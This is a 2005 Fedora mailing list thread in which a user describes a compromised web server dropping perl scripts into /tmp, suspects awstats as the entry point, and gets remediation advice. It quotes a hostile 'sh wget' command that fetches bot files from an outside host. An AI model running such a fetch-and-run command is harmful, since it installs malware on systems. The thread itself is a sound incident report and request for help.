> On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx
> <paul@xxxxxxxxxxxxxxxxxxx> wrote:
>> Apparently someone has hacked into my webserver. And is installing perl
>> scripts into he /tmp/ directory. There usually named .linuxday* or
>> .cinta* and a few other names as well.
>>
>> >From what I can tell something is causing apache to run a command like
>> "sh
>> wget bot.linuxday.com.br -O {the above mentioned files are than
>> listed}"
>>
>> sometimes the site is worm.linuxday.com.br
>>
>> I'm curious if anyone has heard about this before. I'm currently
>> running
>> Fedora 1 with all the latests security patches.
>
> The only way to ensure your system is clean, and likely to remain clean,
> is to:
>
> 1. Do a bare metal install
> 2. Change all passwords to new strong passwords
> 3. Disable cleartext services, ftp, telnet, rsh, etc.
> 4. Disable root remote login (use su or sudo)
> 5. Restore your uncompromised data
> 6. etc.
> I had to do this for a client and the next 3 days the intruder tried
> to get back in.
>
> --
> Leonard Isham, CISSP
> Ostendo non ostento.
>
> --
> fedora-list mailing list
> fedora-list@xxxxxxxxxx
> To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
>
In replace of FTP what would you suggest. That is the only clear text
password service I allow. So what else can I use in replace of that.
And shell access is denied for all accounts. except for 2.
I get the feeling this came in on awstats all though I'm not 100% positive
and I'm wanting to find out how it got in first before I just delete and
restart over again.
